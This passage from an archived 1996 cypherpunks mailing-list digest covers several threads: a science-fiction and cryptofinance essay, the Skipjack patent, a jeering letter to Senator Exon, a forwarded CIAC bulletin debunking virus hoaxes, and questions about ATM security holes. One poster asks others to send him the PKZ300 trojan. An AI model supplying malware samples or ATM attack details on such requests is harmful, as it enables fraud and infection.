>on.

Ditto. Again, I was trying so hard to be facile that I wasn't clear enough.
:-). For all the constraints of televised science fiction, I *really* like
JMS and B5. Especially compared to the pseudoscientific sugar-coated
totalitarian happy horseshit that passes for Star "Treck" these days. Much
less such scienceless silliness as the X-Files, or Lois and Clark.

However, at the risk of being forced into the trap of science fiction which
tells more about when it was written than the future, I find the
presentation in science fiction of faster-than-light travel, "alien" visits
or travel to "alien" cultures, time travel, prophecy, telepathy, (or any
other pseudomystical claptrap) to be extremely annoying. Almost as annoying
as "fantasy", which doesn't even belong near the science fiction bookrack
(how about the "romance novels" section? ;-)). Much less, a science fiction
bookstore. For instance, I think the concepts of faster-than-light travel
and anything beyond rudimentary interstellar radio reception of other
civilizations belongs in the era of the Lensman's "inertialess" drive. An
almost pretelegraphic, age-of-sail world view, developd when sea power was
still the dominant form of "projecting" force.

However, I do look forward to science fiction with cryptoanarchic
economies, and, interestingly enough, a solarcentric universe. People just
don't understand that we have a monsterous amount of undeveloped physical
resources in this solar system. I expect that when we actually look down
with any accuracy on the moon's poles, for instance, we'll find water
buried there ("where the sun don't shine" as a friend put it a few days
ago), just like it is on Murcury. The belt alone is big enough for us to
spread out into into it for the next, say, 7000 years. That's at the human
species' historic argicultural and industrial growth rates, the very same
"frighteningly asymtotic" growth rates that had the Club of Rome gibbering
hysterically in the early 70's. Before, of course, we came to our senses
and remembered that Malthus is still quite dead.

A central fact of human existance is that progress is always more
"geometric" than population growth. Every time we discover a way to extend
human life expectancy, the population grows until everyone goes through a
demographic transition and figures out they don't have to breed so much to
get the same rewards out of life anymore.

We're humans. We build stuff. We always find new resources, and we always
use them to our own advantage. So, what else is new? The extinction rates
that happen and the habitat modifications that humans *always* make when
they take over a new ecosystem have been with us ever since we had the
ability to kill at a distance and use fire. A very long time. Modern humans
grew up living on savannahs, so they cut or burn down forests so they can
hunt game or grow food. (Or suburban lawns, for that matter.) The
aborigines burned their habitat for 40,000 years. The American prairies
have evolved to burn, a process immesurably accellerated by the active
burning by 14,000 years of humans.

Fortunately, we're about to be confronted with our toughest resource
challenge yet. An "ecosystem", or more properly, a set of ecosystems, that
we're going to have to build ourselves, from scratch, outside the earth's
atmosphere, either free-floating in space, or on the surface of an
inhospitable planet. I used to think that that will mean that we would then
use the opportunity to "save" the rest of the species of this planet from
certain extinction. Earth as biopark. Now I see that kind of thinking is
pure romantic hogwash. We are not anti-nature. We *are* nature. We will do
what it takes for us to survive, like any other species. Earth will not be
"saved", it will continue to be modified to our own needs. Because, like
the metaphorical dog, we can. <ewww!!!> :-).  We may not make the same
disaster of it that we made of the Tigris-Euphrates valleys or the
Southeastern Mediterranean, but the "conserving" nature is an oxymoron. Or
maybe even a tautology.

Anyway, this also means taking other species with us when we move off the
earth, and changing those species, and ourselves, to meet the physical
conditions of survival in a new paradigm of extraterrestrial resources. By
way of my own politically correct "reclaiming" of language, I mean
"extraterrestrial resources" literally, of course. Not "extraterrestrial"
as in ETs or BEM's, or LGM's or UFO's, or any other such "alien" bunk. I'm
carving my own crop circles into the landscape of pseudoscience, if you
will, ;-), and using "extraterrestrial" to mean just what it says: off the
earth.


Speaking of other "species", I now also see the technology of cryptofinance
to be integral to this next stage of human expansion. Centralized
industrial control regimes aren't suited to extremely decentralized
automated decisions, like the kind that could happen in a micromarket. I
think that eventually, the idea of micromoney as processor food will create
the economic efficiencies necessary to coordinate the very large
macroengineering projects that extraterrestrial existance will require. If
you can use cryptofinancial controls to organize a swarm of
habitat-building bots, then your structure appears to an observer like it's
building itself. The bots work because they're paid to. They "evolve" into
more efficient builders of stuff because they make more money when they do,
and they compete with each other to do it. By the same token, the money is
not raised by some kind of central financial "action-figure" like McNamara,
or William Sword, or J. Pierpont Morgan, (and especially not a World Bank
McNamara-mandarin) but by a swarm of millions (or billions) of finance-bots
of various kinds living throughout a geodesic economy looking for places to
park their excess cash.

Central project planning considers such competition wasteful, and the
paradox is that the Misian calculation argument holds for a manager of a
macroenterprise the same way it did for any Soviet Commisar. Sooner or
later, you can't figure it all out in enough detail to execute it, and
that's where the project stops. I think we'll step through this dilemma
into a world where everything is, as Kevin Kelly says, "Out of Control",
where stuff happens not because someone planned it down to the last detail,
but because, like the above dog, it can <ewwww!>.


So, what does that mean in terms of science fiction? Well, certainly
Stevenson understands all this, only he's not as much of a space-opera
hound as I am.

Sterling's "Schismatrix" handles extraterrestrial society fairly well, but
it certainly is pre-cryptoanarchy. I didn't like "Islands in the Net" even
though it had the same theme of taking someone out of their mileu and
stopping time around them while the world passed them by. In IitN, the
heroine was being captured by guerillas, in Schmatrix, it was kidnapping
and putting people in suspended animation for a decade or two, just for
kicks.

Frankly, protocrypto or no, Vinge strikes me as more than a little silly at
times, with stasis fields, and physical constants varying with your
distance from the galactic core, and talking dogs and all that other stuff.

Cherryh writes almost perfect space opera, among other things, and I see
her as a perfect decendant of Smith and Heinlein. People I think I now lump
in with Forrester's classic "Hornblower" novels.

I really like Ian Banks, but even his ideas and certainly his politics (and
not his story telling, of course) now pales in comparison to the stuff you
get from imagining the consequences of a geodesic economy.

Gibson now seems positively industrial, and even the Difference Engine
makes perfect sense when seen in this light...


One of the reasons I don't like science fiction anymore is that, like a lot
of people here have said about themselves, and for the first time in my
life, I'm out in front of the science fiction writers on something which is
so fundemental that, frankly, their stuff now makes me laugh. This from
someone who not too long ago read science fiction by the yard. I suppose
this will eventually make me want to evangelize stuff like cryptoanarchy,
financial cryptography, and micromoney mitochondria to science fiction
authors.

Or, maybe, just by shooting our mouths off here and by being archived doing
so, all of us already have done our evangelizing.

On the other hand, some day this stuff will be old hat, and I can go back
to buying science fiction by the yard to learn about new stuff.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 25 Nov 1996 13:42:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Skipjack patent and GATT
Message-ID: <Pine.LNX.3.95.961125163437.520B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Since Skipjack is protected by a secrecy order, the NSA can patent the
algorithm without disclosing it.  As soon as it is reverse-engineered, the
patent is officially issued and expires 17 years from the time it was issued.
GATT now changes the patent laws so that a patent expires 20 years after
application.  Does anyone know how this will affect the Skipjack patent?  If
the secrecy order is considered application, then that would shorten the
lifetime of the patent considerably (assuming it isn't disclosed or reverse-
engineered any time soon).  I doubt this is the case, and I suspect that either
the 17 year lifetime will still apply or the patent will expire 20 years after
the patent is issued.  TIA.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMpoTWyzIPc7jvyFpAQFHywf8Do9Fni5GC0kfL0XR7FGM6yLhVwLNgf4h
XJZlpMMML46MWmmqwjfJnCgi+ktMQMHxTT2mCYA2eIzEBq0FbAc8M9340Xkx0KPH
L1qi2tQ1ZCKnUdVWYENYL65uJAk4dB3lgsnmBJwNb80GD3tP6LVSq5wFSa2pz/Pu
3HO5YNUHmTfvrtZE2wt/7CMwJNxEPTKpTGAbDnwkri6y2u2aDrUD1nhnlfzqUz86
85TNTIpqPo06d3g1wKSKmddwqYeu3kpyu0khdUzS5rjj/7sJAECLQi2IlXkXOLjo
OsaKG+sl9UNSYn9wrU+HvE9BbhlmC4B1sfOHPBqJDQ405QWurQHSZg==
=sRxa
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 25 Nov 1996 17:08:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Exon Countdown Clock and farewell messages
Message-ID: <v02140b04aebfedff4261@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


This is a draft of my letter to our dear retiring senator.  Any suggested
improvements?

-------------
Honorable Senator Exon,

Although in all likelyhood you will never read this memorandum, I wish to
express my sincere regret at your retirement and thanks for your many years
of ignoble service to our nation misrepresenting the wishes of your
constituents.

You have served as a stallwart against change as did those who resisted the
telephone, automobile, radio, television and computer (to name but a few)
before you.  You are a champion of politically correct thinking and
behaviour, perhaps the most dangerous manifestation of an American trend to
intolerence and obedience to social rules.

It is a shame we will not have your carcass to kick around in the halls of
Congress come next term.  All the luck you're due.

-- Steve Schear






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 25 Nov 1996 16:07:21 -0800 (PST)
To: cvhd@indyweb.net
Subject: Re: Symantec's claim.
In-Reply-To: <3.0b36.32.19961125150845.0069fa64@indyweb.net>
Message-ID: <Pine.BSF.3.91.961125172520.10599A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 25 Nov 1996 cvhd@indyweb.net wrote:

> At 03:45 PM 11/25/96 +0200, you wrote:
> 
> 
> >In light of recent claims,i would like somebody to clear this up for me.
> 
> 
> I'll try...
> 

> 
> >A student,a paper,and a possible future career are at stake here,so please dig deep into your 
> 
> >pockets!!!!!! Asking a lot i know!
> 

Kinda sad when students can't even run an alta vista search for themselves.

I get pulled away from my usual work to do 4-5 technical interviews a 
week. I always throw in a few questions that no normal person should know 
the answers to. The ones that make up bullshit lose points, but the ones 
that tell me they don't know the answer, and then tell me how they'd go 
about finding out get hired. I know I'll be able to count on them to deliver.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Date: Mon, 25 Nov 1996 17:12:35 -0800 (PST)
To: CypherPunks <cypherpunks@toad.com>
Subject: [CRYPTO] Bank Cards, Interac, Bank Machines, etc
Message-ID: <Pine.A32.3.93.961125180056.73404A-100000@gpu4.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to hear what everyone knows about security holes in bank
machines.  I don't believe in that little bank machine cracker they used
in Terminator 2, but I'm interested in the algorithms and protocols the
ABM uses to communicate w/ the home bank.  My bank says they have some
special chip inside the ABM to secure the transfer, and that's all they
told me.  

I also heard that the magnetic stripe on the back contains your card
number (the shiny metallized numbers on the front) encrypted using DES
using your PIN as the key.  Way out to lunch?  Too close for comfort?  Any
knowledge...heck, even rumors.... would be appreciated.  That way we can
see what kind of FUD is out there.  My bet is that the magstrip with DES'd
card number on it theory is FUD.  But my bank did say that there were some
fraudulent transfers (read successful hits) in Europe.  I bank with Alberta
Treasury Branches, and they said their hardware is immune to the attack
that was performed in Europe.... I will have to dig a bit on that one.

Anyway, I hope I hear something from all of you soon...

--
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls
http://www.ualberta.ca/~ckuethe/
RSA in 2 lines of PERL: http://www.dcs.ex.ac.uk/~aba/rsa/
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James D. Wilson" <netsurf@pixi.com>
Date: Mon, 25 Nov 1996 21:06:48 -0800 (PST)
To: "cracker@icon.co.za>
Subject: RE: Symantec's claim.
Message-ID: <01BBDB03.5A145F50@netsurfer2.pixi.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3948.1071713645.multipart/mixed"

--Boundary..3948.1071713645.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


  See:  http://www.alw.nih.gov/Security/security.html, and the attachment re Irina, Good Times, etc.

   

----------
From: 	cracker@icon.co.za
Sent: 	Monday, November 25, 1996 3:45 AM
To: 	cypherpunks@toad.com
Subject: 	Symantec's claim.


In light of recent claims,i would like somebody to clear this up for me.
There seems to be a great deal of conjecture over wether or not the Deeyenda Virus exhists.
Symantec denies it's existence,although i hear differently??
Greatly appreciate anyone who can shed some light on the subject,even though C-punks list doesnt usually deal with this topic of thought ;)
Anyone come across the pkz300 trojan,if you have it send it please.
A student,a paper,and a possible future career are at stake here,so please dig deep into your 
pockets!!!!!! Asking a lot i know!

J a m e s
"Lead.Follow. Or get out of the way"
-----------------------------------------------------------------------------------------------
Type Bits/KeyID    Date       User ID
pub  1024/9E318AA5 1996/09/24 Cracker <cracker@icon.co.za>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJHdKwAAAEEALl3A6auLG0JLdtgEzl6KfPNqbTTSDX4L4To2b7PLqGDVV5r
BezC9dD/ITrCK9M64juiQ2p/DNjIihnXlEsJCy2btypStypQgU1fvAei3AnZ1cQ8
NiAnHNS+ImUAJgZjSHEQSevGE53IUovmWQ7YHUz9VpTTCtoJoUKxYuqeMYqlAAUR
tBxDcmFja2VyIDxjcmFja2VyQGljb24uY28uemE+iQCVAwUQMkd0rkKxYuqeMYql
AQEjagP/cYgGLAkWZJLeRcM4URwBX3J/0R54DadVnsvvoxDkzilv7U02IXZGZGnA
CvXsu2sThS7qDBiHFop/OZs3WmlQbQ4BAZ/hiCs5tSU2e7fkk0EKxsGAD1pTbw/J
rRU4WePLc++vv+6CBKw5NCSR5kMh8H3X4qtZZ9dYX9zsuzWKdpk=
=YGH8
-----END PGP PUBLIC KEY BLOCK-----








--Boundary..3948.1071713645.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "Internet Hoaxes- PKZ300- Irina- Good Times- Deeyenda- Ghost (DAVE).url"

W0ludGVybmV0U2hvcnRjdXRdDQpVUkw9aHR0cDovL2NpYWMubGxubC5nb3Yv
Y2lhYy9idWxsZXRpbnMvZGF2ZS5zaHRtbAA=
--Boundary..3948.1071713645.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@stallion.ee>
Date: Mon, 25 Nov 1996 09:06:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Israel crypto restrictions
Message-ID: <Pine.GSO.3.95.961125190042.16124A-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain



Does anyonw knoe about crypto export restrictions in Israel? The Crypto
Law Survey (http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm) says that
there are some restrictions, but "their scope is not clear". Also I have
been iformed of occasions when a company in Israel does not export strong
crypto. Still I believe I have seen many programs from Israel that have
unlimited strong algorithms.

The real question is, why can't Checkpoint who manufactures the Firewall-1
sell DES version in Europe, but only in US and Canada. Elsewhere they use
a proprietary algorithm called FWZ (48-bit). I have not any analysis done
on FWZ so I don't think anyone is using it.

Jüri Kaljundi                         AS Stallion
jk@stallion.ee                        WWW ja andmeturvateenused
                                      http://www.stallion.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 25 Nov 1996 10:21:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Virus-Hoax
Message-ID: <199611251817.TAA26582@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Date: Sat, 23 Nov 1996 18:43:18 -0800
> From: "David Crawford by way of Fence-Walker(UNCL clicking in fm home)" <crawford@eek.llnl.gov>
> Subject: CIAC Bulletin H-05: Internet Hoaxes
> X-Digest: Volume 9 : Issue 230
> 
> - ----BEGIN PGP SIGNED MESSAGE-----
> 
> 
>              __________________________________________________________
> 
>                        The U.S. Department of Energy
>                     Computer Incident Advisory Capability
>                            ___  __ __    _     ___
>                           /       |     /_\   /
>                           \___  __|__  /   \  \___
>              __________________________________________________________
> 
>                              INFORMATION BULLETIN
> 
>             Internet Hoaxes: PKZ300, Irina, Good Times, Deeyenda, Ghost
> 
> November 20, 1996 15:00 GMT                                        Number H-05
> ______________________________________________________________________________
> PROBLEM:       This bulletin addresses the following hoaxes and erroneous
>                warnings: PKZ300 Warning, Irina, Good Times, Deeyenda, and
>                Ghost.exe
> PLATFORM:      All, via e-mail
> DAMAGE:        Time lost reading and responding to the messages
> SOLUTION:      Pass unvalidated warnings only to your computer security
>                department or incident response team. See below on how to
>                recognize validated and unvalidated warnings and hoaxes.
> ______________________________________________________________________________
> VULNERABILITY  New hoaxes and warnings have appeared on the Internet and old
> ASSESSMENT:    hoaxes are still being cirulated.
> ______________________________________________________________________________
> 
> 
> Introduction
> ============
> 
> The Internet is constantly being flooded with information about computer
> viruses and Trojans. However, interspersed among real virus notices are
> computer virus hoaxes. While these hoaxes do not infect systems, they are
> still time consuming and costly to handle. At CIAC, we find that we are
> spending much more time de-bunking hoaxes than handling real virus incidents.
> This advisory addresses the most recent warnings that have appeared on the
> Internet and are being circulated throughout world today. We will also address
> the history behind virus hoaxes, how to identify a hoax, and what to do if you
> think a message is or is not a hoax. Users are requested to please not spread
> unconfirmed warnings about viruses and Trojans. If you receive an unvalidated
> warning, don't pass it to all your friends, pass it to your computer security
> manager to validate first. Validated warnings from the incident response teams
> and antivirus vendors have valid return addresses and are usually PGP signed
> with the organization's key.
> 
> PKZ300 Warning
> ==============
> 
> The PKZ300 Trojan is a real Trojan program, but the initial warning about it
> was released over a year ago. For information pertaining to PKZ300 Trojan
> reference CIAC Notes issue 95-10, that was released in June of 1995.
> 
> http://ciac.llnl.gov/ciac/notes/Notes10.shtml
> 
> The warning itself, on the other hand, is gaining urban legend status. There
> has been an extremely limited number of sightings of this Trojan and those
> appeared over a year ago. Even though the Trojan warning is real, the repeated
> circulation of the warning is a nuisance. Individuals who need the current
> release of  PKZIP should visit the PKWARE web page at http://www.pkware.com.
> CIAC recommends that you DO NOT recirculate the warning about this particular
> Trojan.
> 
> Irina Virus Hoax
> ================
> 
> The "Irina" virus warnings are a hoax. The former head of an electronic
> publishing company circulated the warning to create publicity for a new
> interactive book by the same name. The publishing company has apologized for
> the publicity stunt that backfired and panicked Internet users worldwide. The
> original warning claimed to be from a Professor Edward Pridedaux of the
> College of Slavic Studies in London; there is no such person or college.
> However, London's School of  Slavonic and East European Studies has been
> inundated with calls. This poorly thought-out publicity stunt was highly
> irresponsible. For more information pertaining to this hoax, reference the
> UK Daily Telegraph at http://www.telegraph.co.uk.
> 
> Good Times Virus Hoax
> =====================
> 
> The "Good Times" virus warnings are a hoax. There is no virus by that name in
> existence today. These warnings have been circulating the Internet for years.
> The user community must become aware that it is unlikely that a virus can be
> constructed to behave in the manner ascribed in the "Good Times" virus
> warning. For more information related to this urban legend, reference CIAC
> Notes 95-09.
> 
> http://ciac.llnl.gov/ciac/notes/Notes09.shtml
> 
> Deeyenda Virus Hoax
> ===================
> 
> The "Deeyenda" virus warnings are a hoax. CIAC has received inqueries
> regarding the validity of the Deeyenda virus. The warnings are very similar
> to those for Good Times, stating that the FCC issued a warning about it,
> and that it is self activating and can destroy the contents of a machine
> just by being downloaded. Users should note that the FCC does not and will
> not issue virus or Trojan warnings. It is not their job to do so. As of this
> date, there are no known viruses with the name Deeyenda in existence. For a
> virus to spread, it  must be executed. Reading a mail message does not execute
> the mail message. Trojans and viruses have been found as executable attachments
> to mail messages, but they must be extracted and executed to do any harm. CIAC
> still affirms that reading E-mail, using typical mail agents, can not activate
> malicious code delivered in or with the message.
> 
> Ghost.exe Warning
> =================
> 
> The Ghost.exe program was originally distributed as a free screen saver
> containing some advertising information for the author's company (Access
> Softek). The program opens a window that shows a Halloween background with
> ghosts flying around the screen. On any Friday the 13th, the program window
> title changes and the ghosts fly off the window and around the screen. Someone
> apparently got worried and sent a message indicating that this might be a
> Trojan. The warning grew until the it said that Ghost.exe was a Trojan that
> would destroy your hard drive and the developers got a lot of nasty phone
> calls (their names and phone numbers were in the About box of the program.)
> A simple phone call to the number listed in the program would have stopped
> this warning from being sent out. The original ghost.exe program is just cute;
> it does not do anything damaging. Note that this does not mean that ghost
> could not be infected with a virus that does do damage, so the normal
> antivirus procedure of scanning it before running it should be followed.
> 
> History of Virus Hoaxes
> =======================
> 
> Since 1988, computer virus hoaxes have been circulating the Internet. In
> October of that year, according to Ferbrache ("A pathology of Computer
> Viruses" Springer, London, 1992) one of the first virus hoaxes was the
> 2400 baud modem virus:
> 
> 	SUBJ: Really Nasty Virus
>  	AREA: GENERAL (1)
> 
>  	I've just discovered probably the world's worst computer virus
>  	yet. I had just finished a late night session of BBS'ing and file
>  	treading when I exited Telix 3 and attempted to run pkxarc to
>  	unarc the software I had downloaded. Next thing I knew my hard
>  	disk was seeking all over and it was apparently writing random
>  	sectors. Thank god for strong coffee and a recent backup.
>  	Everything was back to normal, so I called the BBS again and
>  	downloaded a file. When I went to use ddir to list the directory,
>  	my hard disk was getting trashed again. I tried Procomm Plus TD
>  	and also PC Talk 3. Same results every time. Something was up so I
>  	hooked up to my test equipment and different modems (I do research
>  	and development for a local computer telecommunications company
>  	and have an in-house lab at my disposal). After another hour of
>  	corrupted hard drives I found what I think is the world's worst
>  	computer virus yet. The virus distributes itself on the modem sub-
>  	carrier present in all 2400 baud and up modems. The sub-carrier is
>  	used for ROM and register debugging purposes only, and otherwise
>  	serves no othr (sp) purpose. The virus sets a bit pattern in one
>  	of the internal modem registers, but it seemed to screw up the
>  	other registers on my USR. A modem that has been "infected" with
>  	this virus will then transmit the virus to other modems that use a
>  	subcarrier (I suppose those who use 300 and 1200 baud modems
>  	should be immune). The virus then attaches itself to all binary
>  	incoming data and infects the host computer's hard disk. The only
>  	way to get rid of this virus is to completely reset all the modem
>  	registers by hand, but I haven't found a way to vaccinate a modem
>  	against the virus, but there is the possibility of building a
>  	subcarrier filter. I am calling on a 1200 baud modem to enter this
>  	message, and have advised the sysops of the two other boards
>  	(names withheld). I don't know how this virus originated, but I'm
>  	sure it is the work of someone in the computer telecommunications
>  	field such as myself. Probably the best thing to do now is to
>  	stick to 1200 baud until we figure this thing out.
> 
> 	Mike RoChenle
> 
> This bogus virus description spawned a humorous alert by Robert Morris III :
> 
>  	Date: 11-31-88 (24:60)	Number: 32769
>  	To: ALL	Refer#: NONE
>  	From: ROBERT MORRIS III	Read: (N/A)
>  	Subj: VIRUS ALERT	Status: PUBLIC MESSAGE
> 
>  	Warning: There's a new virus on the loose that's worse than
>  	anything I've seen before! It gets in through the power line,
>  	riding on the powerline 60 Hz subcarrier. It works by changing the
>  	serial port pinouts, and by reversing the direction one's disks
>  	spin. Over 300,000 systems have been hit by it here in Murphy,
>  	West Dakota alone! And that's just in the last 12 minutes.
> 
> 	It attacks DOS, Unix, TOPS-20, Apple-II, VMS, MVS, Multics, Mac,
>  	RSX-11, ITS, TRS-80, and VHS systems.
> 
>  	To prevent the spresd of the worm:
> 
>  	1) Don't use the powerline.
>  	2) Don't use batteries either, since there are rumors that this
>  	  virus has invaded most major battery plants and is infecting the
>  	  positive poles of the batteries. (You might try hooking up just
>  	  the negative pole.)
>  	3) Don't upload or download files.
>  	4) Don't store files on floppy disks or hard disks.
>  	5) Don't read messages. Not even this one!
>  	6) Don't use serial ports, modems, or phone lines.
>  	7) Don't use keyboards, screens, or printers.
>  	8) Don't use switches, CPUs, memories, microprocessors, or
>  	  mainframes.
>  	9) Don't use electric lights, electric or gas heat or
>  	  airconditioning, running water, writing, fire, clothing or the
>  	  wheel.
> 
>  	I'm sure if we are all careful to follow these 9 easy steps, this
>  	virus can be eradicated, and the precious electronic flui9ds of
>  	our computers can be kept pure.
> 
>  	---RTM III
> 
> Since that time virus hoaxes have flooded the Internet.With thousands of
> viruses worldwide, virus paranoia in the community has risen to an extremely
> high level. It is this paranoia that fuels virus hoaxes. A good example of
> this behavior is the "Good Times" virus hoax which started in 1994 and is
> still circulating the Internet today. Instead of spreading from one computer
> to another by itself, Good Times relies on people to pass it along.
> 
> How to Identify a Hoax
> ======================
> 
> There are several methods to identify virus hoaxes, but first consider what
> makes a successful hoax on the Internet. There are two known factors that make
> a successful virus hoax, they are: (1) technical sounding language, and
> (2) credibility by association. If the warning uses the proper technical
> jargon, most individuals, including technologically savy individuals, tend to
> believe the warning is real. For example, the Good Times hoax says that
> "...if the program is not stopped, the computer's processor will be placed in
> an nth-complexity infinite binary loop which can severely damage the
> processor...". The first time you read this, it sounds like it might be
> something real. With a little research, you find that there is no such thing
> as an nth-complexity infinite binary loop and that processors are designed
> to run loops for weeks at a time without damage.
> 
> When we say credibility by association we are referring to whom sent the
> warning. If the janitor at a large technological organization sends a warning
> to someone outside of that organization, people on the outside tend to believe
> the warning because the company should know about those things. Even though
> the person sending the warning may not have a clue what he is talking about,
> the prestigue of the company backs the warning, making it appear real. If a
> manager at the company sends the warning, the message is doubly backed by the
> company's and the manager's reputations.
> 
> Individuals should also be especially alert if the warning urges you to pass
> it on to your friends. This should raise a red flag that the warning may be
> a hoax. Another flag to watch for is when the warning indicates that it is a
> Federal Communication Commission (FCC) warning. According to the FCC, they
> have not and never will disseminate warnings on viruses. It is not part of
> their job.
> 
> CIAC recommends that you DO NOT circulate virus warnings without first
> checking with an authoritative source. Authoritative sources are your computer
> system security administrator or a computer incident advisory team. Real
> warnings about viruses and other network problems are issued by different
> response teams (CIAC, CERT, ASSIST, NASIRC, etc.) and are digitally signed by
> the sending team using PGP. If you download a warning from a teams web site or
> validate the PGP signature, you can usually be assured that the warning is
> real. Warnings without the name of the person sending the original notice, or
> warnings with names, addresses and phone numbers that do not actually exist
> are probably hoaxes.
> 
> What to Do When You Receive a Warning
> =====================================
> 
> Upon receiving a warning, you should examine its PGP signature to see that it
> is from a real response team or antivirus organization. To do so, you will
> need a copy of the PGP software and the public signature of the team that
> sent the message. The CIAC signature is available from the CIAC web server
> at:
> 
> http://ciac.llnl.gov
> 
> If there is no PGP signature, see if the warning includes the name of the
> person submitting the original warning. Contact that person to see if he/she
> really wrote the warning and if he/she really touched the virus. If he/she is
> passing on a rumor or if the address of the person does not exist or if
> there is any questions about theauthenticity or the warning, do not circulate
> it to others. Instead, send the warning to your computer security manager or
> incident response team and let them validate it. When in doubt, do not send
> it out to the world. Your computer security managers and the incident response
> teams teams have experts who try to stay current on viruses and their warnings.
> In addition, most anti-virus companies have a web page containing information
> about most known viruses and hoaxes. You can also call or check the web site
> of the company that produces the product that is supposed to contain the virus.
> Checking the PKWARE site for the current releases of PKZip would stop the
> circulation of the warning about PKZ300 since there is no released version 3
> of PKZip. Another useful web site is the "Computer Virus Myths home page"
> (http://www.kumite.com/myths/) which contains descriptions of several known
> hoaxes. In most cases, common sense would eliminate Internet hoaxes.
> 
> - -----------------------------------------------------------------------------
> 
> CIAC, the Computer Incident Advisory Capability, is the computer
> security incident response team for the U.S. Department of Energy
> (DOE) and the emergency backup response team for the National
> Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
> National Laboratory in Livermore, California. CIAC is also a founding
> member of FIRST, the Forum of Incident Response and Security Teams, a
> global organization established to foster cooperation and coordination
> among computer security teams worldwide.
> 
> CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
> can be contacted at:
>     Voice:    +1 510-422-8193
>     FAX:      +1 510-423-8002
>     STU-III:  +1 510-423-2604
>     E-mail:   ciac@llnl.gov
> 
> For emergencies and off-hour assistance, DOE, DOE contractor sites,
> and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
> 8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
> or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
> Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
> duty person, and the secondary PIN number, 8550074 is for the CIAC
> Project Leader.
> 
> Previous CIAC notices, anti-virus software, and other information are
> available from the CIAC Computer Security Archive.
> 
>    World Wide Web:      http://ciac.llnl.gov/
>    Anonymous FTP:       ciac.llnl.gov (128.115.19.53)
>    Modem access:        +1 (510) 423-4753 (28.8K baud)
>                         +1 (510) 423-3331 (28.8K baud)
> 
> CIAC has several self-subscribing mailing lists for electronic
> publications:
> 1. CIAC-BULLETIN for Advisories, highest priority - time critical
>    information and Bulletins, important computer security information;
> 2. CIAC-NOTES for Notes, a collection of computer security articles;
> 3. SPI-ANNOUNCE for official news about Security Profile Inspector
>    (SPI) software updates, new features, distribution and
>    availability;
> 4. SPI-NOTES, for discussion of problems and solutions regarding the
>    use of SPI products.
> 
> Our mailing lists are managed by a public domain software package
> called ListProcessor, which ignores E-mail header subject lines. To
> subscribe (add yourself) to one of our mailing lists, send the
> following request as the E-mail message body, substituting
> CIAC-BULLETIN, CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for list-name and
> valid information for LastName FirstName and PhoneNumber when sending
> 
> E-mail to       ciac-listproc@llnl.gov:
>         subscribe list-name LastName, FirstName PhoneNumber
>   e.g., subscribe ciac-notes OHara, Scarlett W. 404-555-1212 x36
> 
> You will receive an acknowledgment containing address, initial PIN,
> and information on how to change either of them, cancel your
> subscription, or get help.
> 
> PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
> communities receive CIAC bulletins.  If you are not part of these
> communities, please contact your agency's response team to report
> incidents. Your agency's team will coordinate with CIAC. The Forum of
> Incident Response and Security Teams (FIRST) is a world-wide
> organization. A list of FIRST member organizations and their
> constituencies can be obtained by sending email to
> docserver@first.org with an empty subject line and a message body
> containing the line: send first-contacts.
> 
> This document was prepared as an account of work sponsored by an
> agency of the United States Government. Neither the United States
> Government nor the University of California nor any of their
> employees, makes any warranty, express or implied, or assumes any
> legal liability or responsibility for the accuracy, completeness, or
> usefulness of any information, apparatus, product, or process
> disclosed, or represents that its use would not infringe privately
> owned rights. Reference herein to any specific commercial products,
